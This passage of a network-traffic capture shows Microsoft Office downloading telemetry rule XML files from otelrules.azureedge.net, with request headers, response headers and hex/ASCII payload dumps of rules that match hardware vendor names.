9	192.168.2.4	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:00 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:00 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:00 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063300Z-16547b76f7fx6rhxhC1DFW76kg00000007r000000000ad90 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:00 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:00 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:00 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: d3ee7617-001e-00a2-53d4-30d4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063300Z-15869dbbcc662ldwhC1DFWbd5g00000001800000000067f6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:00 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49746	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:00 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:00 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063300Z-16547b76f7fmbrhqhC1DFWkds800000007w00000000030k5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:00 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49747	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:00 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:00 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:00 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: a2886317-b01e-00ab-6c01-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063300Z-16547b76f7fnlcwwhC1DFWz6gw00000007w0000000008egy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:00 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49748	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:01 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 2e71ae26-601e-0097-6701-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-16547b76f7fnlcwwhC1DFWz6gw00000007s000000000nhud x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:01 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49749	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: d86224bc-801e-007b-42b1-30e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-17df447cdb5qkskwhC1DFWeeg4000000045g000000001vf5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-16547b76f7fp6mhthC1DFWrggn00000007tg00000000fxqd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49752	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:01 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-16547b76f7fr4g8xhC1DFW9cqc000000071g000000000xz3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:01 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49751	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:01 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: e16c3d14-801e-00a3-050a-2d7cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-16547b76f7fknvdnhC1DFWxnys00000007x0000000000ddu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:01 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:01 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 4fd4ee51-801e-00a0-0601-2f2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-17df447cdb5l865xhC1DFW9n7g00000000yg0000000090vz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49754	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:01 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 7b5da9ca-601e-0050-1658-2e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063301Z-17df447cdb5g2j9ghC1DFWev0800000003r000000000h2fd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49756	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:02 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:02 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063302Z-16547b76f7fvllnfhC1DFWxkg800000007wg000000001hs5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:02 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 